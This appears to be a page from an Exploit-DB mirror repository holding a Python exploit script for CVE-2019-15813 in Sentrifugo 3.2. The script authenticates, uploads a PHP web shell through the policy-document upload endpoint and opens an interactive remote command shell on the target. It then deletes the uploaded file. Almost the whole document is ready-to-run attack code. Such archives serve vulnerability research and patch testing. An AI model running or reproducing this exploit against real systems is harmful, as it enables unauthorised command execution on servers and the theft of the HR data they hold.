17bbfdaf38
6 changes to exploits/shellcodes TDM Digital Signage PC Player 4.1 - Insecure File Permissions Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse InoERP 0.7.2 - Remote Code Execution (Unauthenticated) Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated) Client Management System 1.0 - 'searchdata' SQL injection Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
96 lines
No EOL
3.4 KiB
Python
Executable file
96 lines
No EOL
3.4 KiB
Python
Executable file
# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
|
|
# Date: 26/10/2020
|
|
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
|
|
# Vendor Homepage: http://www.sentrifugo.com/
|
|
# POC Link: https://www.exploit-db.com/exploits/47323
|
|
# Version: 3.2
|
|
# Tested on: Linux and Windows
|
|
# CVE : CVE-2019-15813
|
|
# Contact Details: https://google.com/search?q=tbhaxor
|
|
|
|
from argparse import ArgumentParser, RawTextHelpFormatter
|
|
from bs4 import BeautifulSoup, Tag
|
|
from requests.sessions import Session
|
|
import tempfile as tmp
|
|
import os.path as path
|
|
import random
|
|
import string
|
|
from huepy import *
|
|
|
|
parser = ArgumentParser(description="Exploit for CVE-2019-15813",
|
|
formatter_class=RawTextHelpFormatter)
|
|
parser.add_argument("--target",
|
|
"-t",
|
|
help="target uri where application is installed",
|
|
required=True,
|
|
metavar="",
|
|
dest="t")
|
|
parser.add_argument("--user",
|
|
"-u",
|
|
help="username to authenticate",
|
|
required=True,
|
|
metavar="",
|
|
dest="u")
|
|
parser.add_argument("--password",
|
|
"-p",
|
|
help="password to authenticate",
|
|
required=True,
|
|
metavar="",
|
|
dest="p")
|
|
args = parser.parse_args()
|
|
|
|
if args.t.endswith("/"):
|
|
args.t = args.t[:-1]
|
|
|
|
F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"
|
|
|
|
with Session() as http:
|
|
print(run("Logging in"))
|
|
data = {"username": args.u, "password": args.p}
|
|
|
|
r = http.post(args.t + "/index.php/index/loginpopupsave",
|
|
data=data,
|
|
allow_redirects=False)
|
|
|
|
if not (r.headers.get("Location", "").endswith("welcome")
|
|
or r.headers.get("Location", "").endswith("welcome/")):
|
|
print(bad("Unable to login. Check username / password"))
|
|
exit(1)
|
|
print(good("Logged in"))
|
|
|
|
print(run("Exploiting"))
|
|
files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}
|
|
|
|
r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
|
|
if r.status_code != 200:
|
|
print(bad("Unable to upload file"))
|
|
exit(1)
|
|
file_name = r.json()["filedata"]["new_name"]
|
|
print(info("Spawning shell"))
|
|
|
|
user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
|
|
data={"cmd": "whoami"})
|
|
host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
|
|
data={"cmd": "cat /etc/hostname"})
|
|
shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
|
|
|
|
while True:
|
|
try:
|
|
cmd = input(shell)
|
|
if cmd == "exit": break
|
|
r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
|
|
file_name,
|
|
data={"cmd": cmd})
|
|
print(r.content.decode().strip())
|
|
except Exception as e:
|
|
print()
|
|
break
|
|
|
|
print(run("Cleaning"))
|
|
http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
|
|
data={"cmd": "rm %s" % file_name})
|
|
r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
|
|
if r.status_code == 404:
|
|
print(good("Cleaned"))
|
|
else:
|
|
print(bad("Unable to clean the file")) |